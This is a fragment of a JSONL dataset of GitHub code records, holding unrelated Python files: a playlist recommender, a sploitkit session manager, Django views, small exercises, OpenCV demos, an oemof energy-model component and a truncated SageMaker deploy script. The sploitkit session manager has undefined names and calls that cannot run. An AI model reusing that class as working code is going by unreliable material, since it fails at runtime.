playlst_ids:\n dict_like[train.loc[i]['id']] = train.loc[i]['like_cnt']\n rec_lst = train[train['id'] == sorted(dict_like.items(), key=lambda x: x[1], reverse=True)[0][0]]['songs'].values[0] \n if len(rec_lst) >= n: \n rec_list = rec_lst[:n] # rec_list : rec_lst에서 n개만큼 추출\n return remove_seen(seen_song, rec_list) \n else:\n lst = remove_seen(rec_lst, best300) # best300에서 rec_lst를 제외한 리스트\n rec_lst += lst[:n-len(rec_lst)] # rec_lst + lst에서 n-len(rec_lst)만큼 추출한 리스트 (총n개)\n return remove_seen(seen_song, rec_lst) # rec_lst에서 seen_song을 제외한 리스트\n else: # song_id가 train에 없는 경우\n rec_lst = best300\n return remove_seen(seen_song, rec_lst)[:100]\n # songs_len이 0인 경우\n else: \n rec_lst = best300\n return remove_seen(seen_song, rec_lst)[:100]\n\ndef rec_100(df):\n rec_100 = []\n no_sim = []\n df = df.reset_index(drop=True)\n for i in range(len(df)):\n if df['songs'][i] in sim_df.columns:\n rec_100 += df['rec_list'][i]\n else:\n no_sim += df['rec_list'][i]\n return rec_100 + list(set(no_sim))[:100-len(rec_100)]\n\ndef _conv(o):\n if isinstance(o, (np.int64, np.int32)):\n return int(o)\n raise TypeError\n\n###### main ######\n\npath = '/home/nsun/mountainGo/'\n\n# 데이터프레임 불러오기\nsong_mel = pd.read_csv(path+'song_mel.csv')\nsong_mel.head()\n\nlabels = song_mel[['song_id']]\ndf= song_mel.drop(columns=['song_id'])\n\n# 유사도 구하기\nsimilarity = cosine_similarity(df) \nsim_df = pd.DataFrame(similarity, index=labels.index, columns=labels.index)\n\n# 데이터 불러오기\ntrain = pd.read_json(path+'train.json')\nval = pd.read_json(path+'val.json')\nval['songs_len'] = val['songs'].apply(lambda x: len(x))\n\n# 전역변수 생성\ntrain_val = pd.concat([train, val])\nbest300 = train_val.songs.explode().value_counts()[:300].index.tolist()\ntrain_songs = train['songs'].explode()\n\n# 플리 내 song별로 각각 추천곡 생성\ndf_val = val[['id','songs','songs_len']].copy().explode('songs')\ndf_val['rec_list'] = df_val.progress_apply(lambda x: rec_each_song(x['id'], x['songs'], x['songs_len']), axis=1)\n\n# 최종 100개 곡 추천\nfinal = df_val.groupby('id').apply(lambda x: rec_100(x))\nlst = []\nfor i in tqdm(range(len(final))):\n d = {}\n d['id'] = final.index[i]\n d['songs'] = final[final.index[i]]\n lst.append(d)\n\n# json 파일로 저장\nwith open(path+'results.json', 'w', encoding='utf-8') as f:\n json.dump(lst, f, ensure_ascii=False, default=_conv) # 한글깨짐 방지\n\n","repo_name":"kyuwoncho/project","sub_path":"MelonPlaylist-main/Mel-spectrogram/mel_cosine_rec.py","file_name":"mel_cosine_rec.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71996016786","text":"# -*- coding: UTF-8 -*-\r\nimport os\r\nimport shlex\r\nimport shutil\r\nfrom subprocess import Popen\r\nfrom tinyscript.helpers import Path\r\n\r\n__all__ = [\"SessionsManager\"]\r\n\r\n\r\nclass Session(object):\r\n \"\"\" Class representing a session object based on a shell command \"\"\"\r\n def __init__(self, n, cmd, **kwargs):\r\n self.id = n\r\n self.parent = kwargs.pop('parent')\r\n if isinstance(cmd, str):\r\n cmd = shlex.split(cmd)\r\n self._path = Path(self.parent.console._files.tempdir, \"session\", str(n), create=True)\r\n for i, s in enumerate([\"stdin\", \"stdout\", \"stderr\"]):\r\n fifo = str(self._path.joinpath(str(i)))\r\n self._named_pipes.append(fifo)\r\n os.mkfifo(fifo, 0o777)\r\n setattr(self, \"_\" + s, os.open(fifo ,os.O_WRONLY))\r\n \r\n def close(self):\r\n for s in [\"stdin\", \"stdout\", \"stderr\"]:\r\n getattr(self, \"_\" + s).close()\r\n shutil.rmtree(str(self._path))\r\n self._process.wait()\r\n del self.parent[self.id]\r\n \r\n def start(self, **kwargs):\r\n kwargs['close_fds'] = True\r\n kwargs['preexec_fn'] = os.setsid # NB: see subprocess' doc ; preexec_fn is not thread-safe\r\n self._process = Popen(cmd, stdout=self._stdout, stderr=self._stderr, stdin=self._stdin, **kwargs) \r\n\r\n\r\nclass SessionsManager(object):\r\n \"\"\" Class for managing session objects. \"\"\"\r\n def __init__(self, max_sessions=None):\r\n self.__sessions = []\r\n self.max = max_sessions\r\n \r\n def __delitem__(self, session_id):\r\n self.__sessions[sessin_id] = None\r\n while self.__sessions[-1] is None:\r\n self.__sessions.pop()\r\n \r\n def __getitem__(self, session_id):\r\n return self.__sessions[int(session_id)]\r\n \r\n def __iter__(self):\r\n for i, s in enumerate(self.__sessions):\r\n if s is not None:\r\n yield i, s\r\n \r\n def __len__(self):\r\n n = 0\r\n for s in self:\r\n n += 1\r\n return n\r\n \r\n def new(self, session):\r\n for i, s in enumerate(self.__session):\r\n if s is None:\r\n self.__session[i] = session\r\n return session\r\n self.__session.append(session)\r\n return session\r\n \r\n def process(self, cmd, **kwargs):\r\n return self.new(Session(self, i+1, cmd, **kwargs))\r\n \r\n def shell(self, shell_cls, *args, **kwargs):\r\n return self.new(shell_cls(*args, **kwargs))\r\n\r\n","repo_name":"dhondta/python-sploitkit","sub_path":"src/sploitkit/core/components/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"48"} +{"seq_id":"15950918304","text":"#encoding:utf-8\nfrom django.template.context_processors import csrf\nfrom django.shortcuts import get_object_or_404, render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Categoria,Slider\nfrom django.template.context import RequestContext\nfrom django.contrib import auth\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom .models import Usuario\nfrom .forms import sliderForm\n\n@login_required(login_url='/usuarios/login/')\ndef agregar_slider(request):\n user = request.user\n usuario = Usuario.objects.get(usuario=user)\n slider = Slider.objects.all()\n categoria = Categoria.objects.all()\n if request.method == 'POST':\n form_slider = sliderForm(request.POST,request.FILES)\n if form_slider.is_valid():\n slider = form_slider.save(commit=False)\n slider.save()\n return redirect('menu-sliders')\n else:\n form_slider = sliderForm()\n args = {}\n args.update(csrf(request))\n page_title = \"AGREGAR SLIDER\"\n template =\"agregar_slider.html\" \n return render(request,template, locals())\n\n@login_required(login_url='/usuarios/login/')\ndef agregar_cat_slider(request):\n page_title = \"AGREGAR CATEGORIA\"\n user = request.user\n template =\"agregar_cat_slider.html\" \n return render(request,template, locals())\n\n@login_required(login_url='/usuarios/login/')\ndef menu_sliders(request):\n page_title = \"SLIDERS\"\n user = request.user\n slider = Slider.objects.all()\n template =\"menu_sliders.html\" \n return render(request,template, locals())\n\n","repo_name":"josefidelmunguia/cms","sub_path":"sliders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14282997405","text":"import random\r\nrock = '''\r\n _______\r\n---' ____)\r\n (_____)\r\n (_____)\r\n (____)\r\n---.__(___)\r\n'''\r\n\r\npaper = '''\r\n _______\r\n---' ____)____\r\n ______)\r\n _______)\r\n _______)\r\n---.__________)\r\n'''\r\n\r\nscissors = '''\r\n _______\r\n---' ____)____\r\n ______)\r\n __________)\r\n (____)\r\n---.__(___)\r\n'''\r\nuser_action = input(\"Enter a choice (rock, paper, scissors): \").lower()\r\npossible_actions = [\"rock\", \"paper\", \"scissors\"]\r\ncomputer_action = random.choice(possible_actions)\r\nif(user_action == \"rock\"):\r\n image_u = rock\r\nelif(user_action == \"paper\"):\r\n image_u = paper\r\nelif(user_action == \"scissors\"):\r\n image_u = scissors\r\nif(computer_action == \"rock\"):\r\n image_c = rock\r\nelif(computer_action == \"paper\"):\r\n image_c = paper\r\nelif(computer_action == \"scissors\"):\r\n image_c = scissors\r\nprint(f\"\\nYou chose {user_action} , computer chose {computer_action} .\\n\")\r\nprint(image_u + \" \" + 'vs' + \" \" + image_c)\r\n\r\nif user_action == computer_action:\r\n print(f\"Both players selected {user_action}. It's a tie!\")\r\nelif user_action == \"rock\":\r\n if computer_action == \"scissors\":\r\n print(\"Rock smashes scissors! You win!\")\r\n else:\r\n print(\"Paper covers rock! You lose.\")\r\nelif user_action == \"paper\":\r\n if computer_action == \"rock\":\r\n print(\"Paper covers rock! You win!\")\r\n else:\r\n print(\"Scissors cuts paper! You lose.\")\r\nelif user_action == \"scissors\":\r\n if computer_action == \"paper\":\r\n print(\"Scissors cuts paper! You win!\")\r\n else:\r\n print(\"Rock smashes scissors! You lose.\")\r\n\r\n","repo_name":"callmenani/Python_programming","sub_path":"Randomization and lists/Rock_Paper_Scisscor.py","file_name":"Rock_Paper_Scisscor.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1478201977","text":"from PIL import Image\nimport numpy as np\nimport cv2\nimport math\nimgpil=Image.open(\"obj94__0.png\")\nimgpil2=Image.open(\"obj94__5.png\")\nimgpil3=Image.open(\"obj94__10.png\")\nimgpil.show()\nimgpil2.show()\nimgpil3.show()\nimg0=imgpil.convert('L')\nimg00=imgpil2.convert('L')\nimg000=imgpil3.convert('L')\nimg0.show()\nimg00.show()\nimg000.show()\nimg=np.array(img0)\nimg2=np.array(img00)\nimg3=np.array(img000)\n#pour la 1ère image\nprint(\"pour la 1ére image:\")\nmoments=cv2.moments(img)\nprint(\"les moments :\",moments)\nhuMoments=cv2.HuMoments(moments)\nprint(\"\\n\")\nfor i in range(0,7):\n huMoments[i]=-1*math.copysign(1.0,huMoments[i])*math.log10(abs(huMoments[i]))\nprint(\"les humoments:\",huMoments)\nprint(\"\\n\")\n\n#pour la 2ème image\nprint(\"pour la 2eme image:\")\nmoments=cv2.moments(img2)\nprint(\"les moments :\",moments)\nhuMoments=cv2.HuMoments(moments)\nprint(\"\\n\")\nfor i in range(0,7):\n huMoments[i]=-1*math.copysign(1.0,huMoments[i])*math.log10(abs(huMoments[i]))\nprint(\"les humoments:\",huMoments)\nprint(\"\\n\")\n\n#pour la 3ème image\nprint(\"pour la 3eme image:\")\nmoments=cv2.moments(img3)\nprint(\"les moments :\",moments)\nhuMoments=cv2.HuMoments(moments)\nprint(\"\\n\")\nfor i in range(0,7):\n huMoments[i]=-1*math.copysign(1.0,huMoments[i])*math.log10(abs(huMoments[i]))\nprint(\"les humoments:\",huMoments)\n","repo_name":"projet-d-ete/code2","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9596656862","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, ForeignKey\nfrom sqlalchemy import Integer, String, Binary, Float\n\nBase = declarative_base()\n\nclass Offer(Base):\n __tablename__ = 'requests'\n offerId = Column(Integer, primary_key=True, autoincrement=True)\n requestId = Column(Integer, ForeignKey('requests.requestId'))\n is_pending = Column(Binary)\n is_confirmed = Column(Binary)\n user_email = Column(String, ForeignKey('users.email'))\n quantity = Column(Float)\n item = Column(String)\n price = Column(Float)\n willing_to_transport = Column(Binary)\n image = Column(String)\n\n def __init__(self, requestId, user_email, quantity, price, willing_to_transport, image):\n self.offerId = Offer.offerId\n self.requestId = requestId\n self.user_email = user_email\n self.quantity = quantity\n self.is_confirmed = False\n self.is_pending = True\n self.price = price\n self.willing_to_transport = willing_to_transport\n self.image = image\n\n def __str__(self):\n return f'Offer {self.offerId} for request {self.requestId}'\n\n def json(self):\n return {'offerId': self.offerId,\n 'requestId': self.requestId,\n 'user_email': self.user_email,\n 'quantity': self.quantity,\n 'is_confirmed': self.is_confirmed,\n 'is_pending': self.is_pending,\n 'price': self.price,\n 'willing_to_transport': self.willing_to_transport,\n 'image': self.image}","repo_name":"trevor-pope/covid19-supply-network","sub_path":"backend/models/offer.py","file_name":"offer.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4998707194","text":"#!/usr/bin/env python3\n\n############################################################################################\n# #\n# Program purpose: Finds whether a given string starts with a given character using #\n# lambda. #\n# Program Author : Happi Yvan #\n# Creation Date : February 04, 2020 #\n# #\n############################################################################################\n\ndef obtain_user_data(input_mess) -> str:\n user_data, valid = '', False\n while not valid:\n try:\n user_data = input(input_mess)\n if len(user_data) == 0:\n raise ValueError(\"Oops, data needed\")\n valid = True\n except ValueError as ve:\n print(f'[ERROR]: {ve}')\n return user_data\n\nif __name__ == \"__main__\":\n\n lambda_func = lambda data, search: True if data.startswith(search) else False\n\n main_str = obtain_user_data(input_mess='Enter main string: ')\n search_str = obtain_user_data(input_mess='Enter search string: ')\n\n print(f\"Search 'startswith' found: {lambda_func(main_str, search_str)}\")\n","repo_name":"ivenpoker/Python-Projects","sub_path":"Projects/Online Workouts/w3resource/Lambda/program-7.py","file_name":"program-7.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42041817563","text":"def main():\n boxWidth = int(input(\"Please enter the width of the box: \"))\n boxHeight = int(input(\"Please enter the height of the box: \"))\n outlineSymbol = input(\"Please enter a symbol for the box outline: \")\n fillSymbol = input(\"Please enter a symbol for the box fill: \")\n boxCounter = 0\n for i in range(boxCounter, boxHeight):\n if(boxCounter == (boxHeight-1) or boxCounter == 0):\n print(outlineSymbol * boxWidth)\n boxCounter = boxCounter +1\n else:\n print(outlineSymbol + fillSymbol *(boxWidth -2) + outlineSymbol)\n boxCounter = boxCounter +1 \nmain()\n","repo_name":"MAPLE-Robot-Subgoaling/IPT","sub_path":"data/HW5/hw5_176.py","file_name":"hw5_176.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73036050067","text":"import cv2 as cv\nimport numpy as np\n\ndef canny_demo(image):\n blur = cv.GaussianBlur(image, (3, 3), 0)\n gray = cv. cvtColor(blur, cv.COLOR_BGR2GRAY)\n grad_x = cv.Sobel(gray, cv.CV_16SC1, 1, 0)\n grad_y = cv.Sobel(gray, cv.CV_16SC1, 0, 1)\n edge = cv.Canny(grad_x, grad_y, 50, 150)\n dst = cv.bitwise_and(image, image, mask=edge)\n cv.imshow(\"edge\", dst)\n\ndef line_detection(image):\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray, 50, 150, apertureSize=3)\n cv.imshow(\"gray\", edges)\n lines = cv.HoughLines(edges, 1, np.pi/180, 200)\n for line in lines:\n rho, theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * a)\n cv.line(image, (x1, y1), (x2, y2), (255, 0 ,0), 2)\n cv.namedWindow(\"lines\", cv.WINDOW_NORMAL)\n cv.imshow(\"lines\", image)\n\n\ndef line_detection_possible_demo(image):\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n edges = cv.Canny(gray, 50, 150, apertureSize=3)\n lines = cv.HoughLinesP(edges, 1, np.pi/180, 100, minLineLength= 50, maxLineGap= 10)\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2)\n cv.namedWindow(\"line_possible\", cv.WINDOW_NORMAL)\n cv.imshow(\"line_possible\", image)\n\n\n\n\n\nsrc = cv.imread(\"line.jpg\")\n# line_detection(src)\nline_detection_possible_demo(src)\ncv.waitKey(0)\ncv.destroyAllWindows()\n","repo_name":"xtings/openCV_demo","sub_path":"tut14_canny.py","file_name":"tut14_canny.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13003054908","text":"import sys\nsys.stdin = open(\"[TST] 숫자 찾기 (이진탐색)_input.txt\", \"r\")\n\ndef binary_search(a, key):\n start = 0\n end = len(a) - 1\n while start <= end:\n middle = (start + end) // 2\n\n if key == a[middle]: # 검색성공\n return middle + 1\n elif key < a[middle]:\n end = middle - 1\n else:\n start = middle + 1\n return 0\n\nN = int(input())\ndata = list(map(int, input().split()))\nT = int(input())\nkey = list(map(int, input().split()))\n\nfor i in key:\n print(binary_search(data, i))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/문제/수업/D-13t/AD/[TST] 숫자 찾기 (이진탐색).py","file_name":"[TST] 숫자 찾기 (이진탐색).py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73828670547","text":"from warnings import warn\n\nfrom oemof.network import Node\nfrom pyomo.core import BuildAction\nfrom pyomo.core.base.block import ScalarBlock\nfrom pyomo.environ import Constraint\nfrom pyomo.environ import Set\n\nfrom oemof.solph._plumbing import sequence\n\n\nclass OffsetConverter(Node):\n \"\"\"An object with one input and one output and two coefficients to model\n part load behaviour.\n\n Parameters\n ----------\n coefficients : tuple, (:math:`C_0(t)`, :math:`C_1(t)`)\n Tuple containing the first two polynomial coefficients\n i.e. the y-intersection and slope of a linear equation.\n The tuple values can either be a scalar or a sequence with length\n of time horizon for simulation.\n\n Notes\n -----\n The sets, variables, constraints and objective parts are created\n * :py:class:`~oemof.solph.components._offset_converter.OffsetConverterBlock`\n\n Examples\n --------\n >>> from oemof import solph\n >>> bel = solph.buses.Bus(label='bel')\n >>> bth = solph.buses.Bus(label='bth')\n >>> ostf = solph.components.OffsetConverter(\n ... label='ostf',\n ... inputs={bel: solph.flows.Flow()},\n ... outputs={bth: solph.flows.Flow(\n ... nominal_value=60, min=0.5, max=1.0,\n ... nonconvex=solph.NonConvex())},\n ... coefficients=(20, 0.5))\n >>> type(ostf)\n \n \"\"\" # noqa: E501\n\n def __init__(\n self,\n inputs,\n outputs,\n label=None,\n coefficients=None,\n custom_attributes=None,\n ):\n if custom_attributes is None:\n custom_attributes = {}\n super().__init__(\n inputs=inputs,\n outputs=outputs,\n label=label,\n **custom_attributes,\n )\n\n if coefficients is not None:\n self.coefficients = tuple([sequence(i) for i in coefficients])\n if len(self.coefficients) != 2:\n raise ValueError(\n \"Two coefficients or coefficient series have to be given.\"\n )\n\n # `OffsetConverter` always needs the `NonConvex` attribute, but the\n # `Investment` attribute is optional. If it is used, the\n # `InvestNonConvexFlow` will be used in the definition of constraints,\n # otherwise, the `NonConvexFlow` will be used.\n if len(self.outputs):\n for v in self.outputs.values():\n if not v.nonconvex:\n raise TypeError(\n \"Output flow must have the `NonConvex` attribute!\"\n )\n\n # `Investment` and `NonConvex` attributes cannot be defined for the\n # input flow.\n if len(self.inputs):\n for v in self.inputs.values():\n if v.investment:\n raise TypeError(\n \"`Investment` attribute must be defined only for the \"\n + \"output flow!\"\n )\n if v.nonconvex:\n raise TypeError(\n \"`NonConvex` attribute must be defined only for the \"\n + \"output flow!\"\n )\n\n if len(self.inputs) > 1 or len(self.outputs) > 1:\n raise ValueError(\n \"Component `OffsetConverter` must not have \"\n + \"more than 1 input and 1 output!\"\n )\n\n def constraint_group(self):\n return OffsetConverterBlock\n\n\n# --- BEGIN: To be removed for versions >= v0.6 ---\nclass OffsetTransformer(OffsetConverter):\n def __init__(\n self,\n inputs,\n outputs,\n label=None,\n coefficients=None,\n custom_attributes=None,\n ):\n super().__init__(\n label=label,\n inputs=inputs,\n outputs=outputs,\n coefficients=coefficients,\n custom_attributes=custom_attributes,\n )\n warn(\n \"solph.components.OffsetTransformer has been renamed to\"\n \" solph.components.OffsetConverter. The transitional wrapper\"\n \" will be deleted in the future.\",\n FutureWarning,\n )\n\n\n# --- END ---\n\n\nclass OffsetConverterBlock(ScalarBlock):\n r\"\"\"Block for the relation of nodes with type\n :class:`~oemof.solph.components._offset_converter.OffsetConverter`\n\n **The following constraints are created:**\n\n .. _OffsetConverter-equations:\n\n .. math::\n &\n P_{in}(p, t) = C_1(t) \\cdot P_{out}(p, t) + C_0(t) \\cdot P_max(p) \\cdot Y(t) \\\\\n\n\n The symbols used are defined as follows (with Variables (V) and Parameters (P)):\n\n +--------------------+------------------------+------+--------------------------------------------+\n | symbol | attribute | type | explanation |\n +====================+========================+======+============================================+\n | :math:`P_{out}(t)` | `flow[n,o,p,t]` | V | Outflow of converter |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`P_{in}(t)` | `flow[i,n,p,t]` | V | Inflow of converter |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`Y(t)` | | V | Binary status variable of nonconvex inflow |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`P_{max}(t)` | | V | Maximum Outflow of converter |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`C_1(t)` | `coefficients[1][n,t]` | P | Linear coefficient 1 (slope) |\n +--------------------+------------------------+------+--------------------------------------------+\n | :math:`C_0(t)` | `coefficients[0][n,t]` | P | Linear coefficient 0 (y-intersection) |\n +--------------------+------------------------+------+--------------------------------------------+\n\n Note that :math:`P_{max}(t) \\cdot Y(t)` is merged into one variable,\n called `status_nominal[n, o, p, t]`.\n \"\"\" # noqa: E501\n CONSTRAINT_GROUP = True\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def _create(self, group=None):\n \"\"\"Creates the relation for the class:`OffsetConverter`.\n\n Parameters\n ----------\n group : list\n List of oemof.solph.experimental.OffsetConverter objects for\n which the relation of inputs and outputs is created\n e.g. group = [ostf1, ostf2, ostf3, ...]. The components inside\n the list need to hold an attribute `coefficients` of type dict\n containing the conversion factors for all inputs to outputs.\n \"\"\"\n if group is None:\n return None\n\n m = self.parent_block()\n\n self.OFFSETCONVERTERS = Set(initialize=[n for n in group])\n\n in_flows = {n: [i for i in n.inputs.keys()] for n in group}\n out_flows = {n: [o for o in n.outputs.keys()] for n in group}\n\n self.relation = Constraint(\n [\n (n, i, o, p, t)\n for p, t in m.TIMEINDEX\n for n in group\n for o in out_flows[n]\n for i in in_flows[n]\n ],\n noruleinit=True,\n )\n\n def _relation_rule(block):\n \"\"\"Link binary input and output flow to component outflow.\"\"\"\n for p, t in m.TIMEINDEX:\n for n in group:\n for o in out_flows[n]:\n for i in in_flows[n]:\n expr = 0\n expr += -m.flow[n, o, p, t]\n expr += m.flow[i, n, p, t] * n.coefficients[1][t]\n # `Y(t)` in the last term of the constraint\n # (\":math:`C_0(t) \\cdot Y(t)`\") is different for\n # different cases. If both `Investment` and\n # `NonConvex` attributes are used for the\n # `OffsetConverter`, `Y(t)` would represent the\n # `status_nominal[n,o,t]` in the\n # `InvestNonConvexFlow`. But if only the\n # `NonConvex` attribute is defined for the\n # `OffsetConverter`, `Y(t)` would correspond to\n # the `status_nominal[n,o,t]` in the\n # `NonConvexFlow`.\n try:\n expr += (\n m.InvestNonConvexFlowBlock.status_nominal[\n n, o, t\n ]\n * n.coefficients[0][t]\n )\n # `KeyError` occurs when more than one\n # `OffsetConverter` is defined, and in some of\n # them only the `NonConvex` attribute is\n # considered, while in others both `NonConvex`\n # and `Investment` attributes are defined.\n # `AttributeError` only occurs when the\n # `OffsetConverter` has only the `NonConvex`\n # attribute, and therefore,\n # `m.InvestNonConvexFlowBlock.status_nominal`\n # (inside the `try` block) does not exist.\n except (KeyError, AttributeError):\n expr += (\n m.NonConvexFlowBlock.status_nominal[\n n, o, t\n ]\n * n.coefficients[0][t]\n )\n block.relation.add((n, i, o, p, t), (expr == 0))\n\n self.relation_build = BuildAction(rule=_relation_rule)\n","repo_name":"oemof/oemof-solph","sub_path":"src/oemof/solph/components/_offset_converter.py","file_name":"_offset_converter.py","file_ext":"py","file_size_in_byte":10298,"program_lang":"python","lang":"en","doc_type":"code","stars":255,"dataset":"github-code","pt":"48"} +{"seq_id":"37615301363","text":"# a = 9\n# wantedLength = 5\n# ans = [0]*wantedLength\n\n# for i in range(wantedLength):\n# quo = a // (2**(wantedLength-1-i))\n# rem = a % (2**(wantedLength-1-i))\n\n# if quo == 1:\n# a = rem\n# ans[i] = 1\n\n# print(ans)\n\n# a = 20\n\n\n# def binary(n):\n# if n <= 1:\n# return str(n)\n# else:\n# return binary(n//2) + str(n % 2)\n\n\n# print(binary(a))\n\na = 9\nwantedLength = 5\n\n\ndef binary(n):\n output = \"\"\n for j in range(wantedLength-1, -1, -1):\n output += \"1\" if n & (1 << j) else \"0\"\n return output\n\n\nprint(binary(a))\n","repo_name":"harimchung/algorithm","sub_path":"numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26544732860","text":"import argparse\nimport boto3\nfrom distutils.dir_util import copy_tree\nfrom huggingface_hub import snapshot_download\nimport json\nimport logging\nimport os\nfrom pathlib import Path\nimport sagemaker.session\nfrom sagemaker.huggingface.model import HuggingFaceModel\nimport tarfile\nfrom tempfile import TemporaryDirectory\nimport time\nfrom zipfile import ZipFile\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nmodel_dir_name = \"model\"\ns3_artifacts_path = \"artifacts/lambda\"\ns3_model_path = \"models\"\n\nlogger = logging.getLogger(__name__)\n\nsagemaker_session = sagemaker.Session()\n\ns3_client = boto3.client(\"s3\")\nsagemaker_client = boto3.client(\"sagemaker\")\n\n# helper to create the model.tar.gz\ndef compress(tar_dir=None, output_file=\"model.tar.gz\"):\n parent_dir = os.getcwd()\n os.chdir(tar_dir)\n with tarfile.open(os.path.join(parent_dir, output_file), \"w:gz\") as tar:\n for item in os.listdir('.'):\n print(item)\n tar.add(item, arcname=item)\n os.chdir(parent_dir)\n\n\ndef extend_config(args, stage_config, container_def):\n \"\"\"\n Extend the stage configuration with additional parameters and tags based.\n \"\"\"\n # Verify that config has parameters and tags sections\n if not \"Parameters\" in stage_config or not \"StageName\" in stage_config[\"Parameters\"]:\n raise Exception(\"Configuration file must include SageName parameter\")\n if not \"Tags\" in stage_config:\n stage_config[\"Tags\"] = {}\n # Create new params and tags\n new_params = {\n \"ContainerImage\": container_def[\"Image\"],\n \"EndpointInstanceCount\": str(args.inference_instance_count),\n \"EndpointInstanceType\": args.inference_instance_type,\n \"EndpointName\": args.endpoint_name,\n \"LambdaName\": args.lambda_name,\n \"LambdaPath\": s3_artifacts_path + \"/lambda.zip\",\n \"ModelDataUrl\": container_def[\"ModelDataUrl\"],\n \"ModelName\": args.model_name + \"-\" + str(round(time.time())),\n \"ModelExecutionRoleArn\": args.model_execution_role,\n \"S3BucketArtifacts\": args.default_bucket,\n \"SageMakerProjectName\": args.sagemaker_project_name,\n \"SageMakerProjectId\": args.sagemaker_project_id\n }\n\n new_tags = {\n \"sagemaker:deployment-stage\": stage_config[\"Parameters\"][\"StageName\"],\n \"sagemaker:project-id\": args.sagemaker_project_id,\n \"sagemaker:project-name\": args.sagemaker_project_name,\n }\n # Add tags from Project\n get_pipeline_custom_tags(args, sagemaker_client, new_tags)\n\n return {\n \"Parameters\": {**stage_config[\"Parameters\"], **new_params},\n \"Tags\": {**stage_config.get(\"Tags\", {}), **new_tags},\n }\n\ndef get_pipeline_custom_tags(args, sagemaker_client, new_tags):\n try:\n response = sagemaker_client.list_tags(\n ResourceArn=args.sagemaker_project_arn)\n project_tags = response[\"Tags\"]\n for project_tag in project_tags:\n new_tags[project_tag[\"Key\"]] = project_tag[\"Value\"]\n except:\n logger.error(\"Error getting project tags\")\n return new_tags\n\ndef get_cfn_style_config(stage_config):\n parameters = []\n for key, value in stage_config[\"Parameters\"].items():\n parameter = {\n \"ParameterKey\": key,\n \"ParameterValue\": value\n }\n parameters.append(parameter)\n tags = []\n for key, value in stage_config[\"Tags\"].items():\n tag = {\n \"Key\": key,\n \"Value\": value\n }\n tags.append(tag)\n return parameters, tags\n\ndef create_cfn_params_tags_file(config, export_params_file, export_tags_file):\n # Write Params and tags in separate file for Cfn cli command\n parameters, tags = get_cfn_style_config(config)\n with open(export_params_file, \"w\") as f:\n json.dump(parameters, f, indent=4)\n with open(export_tags_file, \"w\") as f:\n json.dump(tags, f, indent=4)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--log-level\", type=str, default=os.environ.get(\"LOGLEVEL\", \"INFO\").upper())\n parser.add_argument(\"--aws-region\", type=str, required=True)\n parser.add_argument(\"--default-bucket\", type=str, required=True)\n parser.add_argument(\"--endpoint_name\", type=str, default=\"flan-t5-endpoint\")\n parser.add_argument(\"--hf-model-id\", type=str, default=\"philschmid/flan-t5-xxl-sharded-fp16\")\n parser.add_argument(\"--inference-transformers-version\", type=str, default=\"4.17\")\n parser.add_argument(\"--inference-framework-version\", type=str, default=\"1.10\")\n parser.add_argument(\"--inference-instance-type\", type=str, default=\"ml.g5.xlarge\")\n parser.add_argument(\"--inference-instance-count\", type=str, default=1)\n parser.add_argument(\"--inference-python-version\", type=str, default=\"py38\")\n parser.add_argument(\"--lambda-name\", type=str, default=\"Multi-Language-GenAI\")\n parser.add_argument(\"--model-execution-role\", type=str, required=True)\n parser.add_argument(\"--model-name\", type=str, default=\"flan-t5-xxl\")\n parser.add_argument(\"--sagemaker-project-id\", type=str, required=True)\n parser.add_argument(\"--sagemaker-project-name\", type=str, required=True)\n parser.add_argument(\"--sagemaker-project-arn\", type=str, required=False)\n parser.add_argument(\"--import-staging-config\", type=str, default=\"staging-config.json\")\n parser.add_argument(\"--export-staging-config\", type=str, default=\"staging-config-export.json\")\n parser.add_argument(\"--export-staging-params\", 